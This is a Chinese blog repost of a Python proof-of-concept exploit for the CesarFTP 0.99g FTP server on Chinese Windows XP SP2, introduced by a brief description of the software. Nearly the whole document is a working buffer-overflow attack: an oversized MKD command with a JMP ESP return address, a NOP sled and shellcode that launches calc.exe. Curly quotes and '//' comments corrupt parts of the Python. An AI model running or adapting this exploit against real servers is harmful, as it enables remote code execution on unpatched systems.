CesarFtp 0.99g Exploit for 中文系统

来源：MIAO’BLOG

CesarFTP是一款非常优秀的免费FTP服务器端软件，虽然它的体积很小，但功能却非常完善。它的安装非常简单，不需要像其它FTP服务器软件（如： 前面介绍的Serv-U FTP）那样经过复杂的系统配置才能使用，安装完成后FTP服务器就可以正常启动，特别适合一般用户的使用。
目前CesarFTP的最新版本是CesarFTP V0.99g汉化版

——-code——–

#!/usr/bin/python
#CesarFtp 0.99g Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 cn
#Bug found by h07 [[email]h07@interia.pl[/email]]
#rewrite by friddy
#Date: 9.23.2008

from socket import *

shellcode = (#window calc.exe
“\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe”
“\x48\x93\xa9\x83\xeb\xfc\xe2\xf4\x42\xa0\xd7\xa9\xbe\x48\x18\xec”
“\x82\xc3\xef\xac\xc6\x49\x7c\x22\xf1\x50\x18\xf6\x9e\x49\x78\xe0″
“\x35\x7c\x18\xa8\x50\x79\x53\x30\x12\xcc\x53\xdd\xb9\x89\x59\xa4″
“\xbf\x8a\x78\x5d\x85\x1c\xb7\xad\xcb\xad\x18\xf6\x9a\x49\x78\xcf”
“\x35\x44\xd8\x22\xe1\x54\x92\x42\x35\x54\x18\xa8\x55\xc1\xcf\x8d”
“\xba\x8b\xa2\x69\xda\xc3\xd3\x99\x3b\x88\xeb\xa5\x35\x08\x9f\x22″
“\xce\x54\x3e\x22\xd6\x40\x78\xa0\x35\xc8\x23\xa9\xbe\x48\x18\xc1″
“\x82\x17\xa2\x5f\xde\x1e\x1a\x51\x3d\x88\xe8\xf9\xd6\xb8\x19\xad”
“\xe1\x20\x0b\x57\x34\x46\xc4\x56\x59\x2b\xf2\xc5\xdd\x66\xf6\xd1″
“\xdb\x48\x93\xa9″)

host = “127.0.0.1″
port = 21
user = “friddy”
password = “friddy”

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))

print s.recv(1024)

s.send(”user %s\r\n” % (user))
print s.recv(1024)

s.send(”pass %s\r\n” % (password))
print s.recv(1024)

buffer = “MKD ”
buffer += “\n” * 671
buffer += “A” * 3 + “\x12\x45\xfa\x7f” //JMP ESP
buffer += “\x90″ * 40 + shellcode
buffer += “\r\n”

print “len: %d” % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

#EoF